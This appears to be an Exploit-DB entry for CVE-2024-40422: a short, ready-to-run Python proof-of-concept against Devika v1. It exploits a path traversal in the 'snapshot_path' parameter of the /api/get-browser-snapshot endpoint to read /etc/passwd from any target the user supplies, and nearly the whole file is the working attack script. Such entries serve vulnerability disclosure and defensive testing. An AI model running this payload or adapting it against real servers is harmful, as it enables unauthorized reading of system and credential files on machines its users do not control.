exploit-db-mirror/exploits/python/webapps/52066.py

# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422

#!/usr/bin/python

import argparse
import requests

def exploit(target_url):
    url = f'http://{target_url}/api/get-browser-snapshot'
    params = {
        'snapshot_path': '../../../../etc/passwd'
    }

    response = requests.get(url, params=params)
    print(response.text)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
    args = parser.parse_args()

    exploit(args.target)